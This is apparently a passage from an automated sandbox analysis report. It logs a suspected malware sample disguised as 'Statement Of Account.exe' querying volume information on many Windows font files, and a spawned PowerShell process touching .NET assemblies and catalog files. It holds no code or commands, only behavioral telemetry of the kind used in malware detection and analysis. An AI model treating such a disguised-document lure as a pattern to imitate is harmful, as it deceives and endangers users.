          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
